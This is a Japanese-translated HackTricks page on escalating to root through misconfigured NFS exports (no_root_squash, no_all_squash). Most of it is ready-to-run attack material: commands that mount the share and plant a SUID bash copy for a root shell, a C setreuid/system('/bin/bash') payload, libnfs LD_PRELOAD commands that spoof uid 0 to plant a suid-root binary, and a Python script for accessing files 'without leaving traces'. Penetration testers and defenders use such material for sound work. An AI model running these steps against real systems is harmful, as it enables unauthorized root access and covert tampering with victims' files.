NFS no_root_squash/no_all_squash misconfiguration PE

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

_ /etc/exports _ ファイルを読み、no_root_squashとして設定されているディレクトリが見つかった場合、クライアントとしてそれにアクセスし、そのディレクトリの中にローカルのマシンのrootのように書き込むことができます。

no_root_squash: このオプションは基本的に、クライアントのrootユーザーにNFSサーバー上のファイルにrootとしてアクセスする権限を与えます。これにより、深刻なセキュリティ上の問題が生じる可能性があります。

no_all_squash: これはno_root_squashオプションに似ていますが、非rootユーザーに適用されます。例えば、nobodyユーザーとしてシェルを持ち、/etc/exportsファイルを確認し、no_all_squashオプションが存在し、/etc/passwdファイルを確認し、非rootユーザーをエミュレートし、そのユーザーとしてsuidファイルを作成（nfsを使用してマウント）します。その後、nobodyユーザーとしてsuidを実行し、異なるユーザーになります。

Privilege Escalation

Remote Exploit

この脆弱性を見つけた場合、次のように悪用できます：

そのディレクトリをクライアントマシンにマウントし、rootとしてマウントされたフォルダ内に**/bin/bash**バイナリをコピーし、SUID権限を与え、被害者マシンからそのbashバイナリを実行します。

#Attacker, as root user
mkdir /tmp/pe
mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe
cd /tmp/pe
cp /bin/bash .
chmod +s bash

#Victim
cd <SHAREDD_FOLDER>
./bash -p #ROOT shell

クライアントマシンでそのディレクトリをマウントし、 マウントされたフォルダ内に rootとして SUID権限を悪用するコンパイル済みペイロードをコピーし、それに SUID 権限を与え、被害者 マシンからそのバイナリを実行します（ここにいくつかのC SUIDペイロードがあります）。

#Attacker, as root user
gcc payload.c -o payload
mkdir /tmp/pe
mount -t nfs <IP>:<SHARED_FOLDER> /tmp/pe
cd /tmp/pe
cp /tmp/payload .
chmod +s payload

#Victim
cd <SHAREDD_FOLDER>
./payload #ROOT shell

Local Exploit

注意してください、もしあなたがあなたのマシンから被害者のマシンへのトンネルを作成できるなら、必要なポートをトンネリングしてこの特権昇格を悪用するためにリモートバージョンを使用することができます。次のトリックは、ファイル/etc/exportsがIPを示している場合です。この場合、リモートエクスプロイトを使用することはできず、このトリックを悪用する必要があります。エクスプロイトが機能するためのもう一つの必要条件は、/etc/export内のエクスポートがinsecureフラグを使用していることです。 --もし/etc/exportがIPアドレスを示している場合、このトリックが機能するかどうかはわかりません--

Basic Information

このシナリオは、ローカルマシン上のマウントされたNFS共有を悪用し、クライアントが自分のuid/gidを指定できるNFSv3仕様の欠陥を利用して、無許可のアクセスを可能にします。悪用には、NFS RPCコールの偽造を可能にするライブラリlibnfsを使用します。

Compiling the Library

ライブラリのコンパイル手順は、カーネルバージョンに基づいて調整が必要な場合があります。この特定のケースでは、fallocateシステムコールがコメントアウトされていました。コンパイルプロセスには、次のコマンドが含まれます：

./bootstrap
./configure
make
gcc -fPIC -shared -o ld_nfs.so examples/ld_nfs.c -ldl -lnfs -I./include/ -L./lib/.libs/

攻撃の実行

この攻撃は、特権をルートに昇格させ、シェルを実行するシンプルなCプログラム（pwn.c）を作成することを含みます。プログラムはコンパイルされ、結果として得られたバイナリ（a.out）は、RPC呼び出しでuidを偽装するためにld_nfs.soを使用して、suid rootで共有に配置されます。

攻撃コードをコンパイルする:

cat pwn.c
int main(void){setreuid(0,0); system("/bin/bash"); return 0;}
gcc pwn.c -o a.out

攻撃を共有に配置し、uidを偽装してその権限を変更する:

LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so cp ../a.out nfs://nfs-server/nfs_root/
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chown root: nfs://nfs-server/nfs_root/a.out
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod o+rx nfs://nfs-server/nfs_root/a.out
LD_NFS_UID=0 LD_LIBRARY_PATH=./lib/.libs/ LD_PRELOAD=./ld_nfs.so chmod u+s nfs://nfs-server/nfs_root/a.out

攻撃を実行してルート権限を取得する:

/mnt/share/a.out
#root

ボーナス: NFShellによるステルスファイルアクセス

ルートアクセスを取得した後、所有権を変更せずにNFS共有と対話するために（痕跡を残さないために）、Pythonスクリプト（nfsh.py）が使用されます。このスクリプトは、アクセスされるファイルのuidに一致するようにuidを調整し、権限の問題なしに共有上のファイルと対話できるようにします:

#!/usr/bin/env python
# script from https://www.errno.fr/nfs_privesc.html
import sys
import os

def get_file_uid(filepath):
try:
uid = os.stat(filepath).st_uid
except OSError as e:
return get_file_uid(os.path.dirname(filepath))
return uid

filepath = sys.argv[-1]
uid = get_file_uid(filepath)
os.setreuid(uid, uid)
os.system(' '.join(sys.argv[1:]))

実行するには：

# ll ./mount/
drwxr-x---  6 1008 1009 1024 Apr  5  2017 9.3_old

HackTricksをサポートする

サブスクリプションプランを確認してください！
**💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
ハッキングのトリックを共有するには、HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してください。

PreviousLinux Capabilities NextNode inspector/CEF debug abuse

Last updated 4 months ago